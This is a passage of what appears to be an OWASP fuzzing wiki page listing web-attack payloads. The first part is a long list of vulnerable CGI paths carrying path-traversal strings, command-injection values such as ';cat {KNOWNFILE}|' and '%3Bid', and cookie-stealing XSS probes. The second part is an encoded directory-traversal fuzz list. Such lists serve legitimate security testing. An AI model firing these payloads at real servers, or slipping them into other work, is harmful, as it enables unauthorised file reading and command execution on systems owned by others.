mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
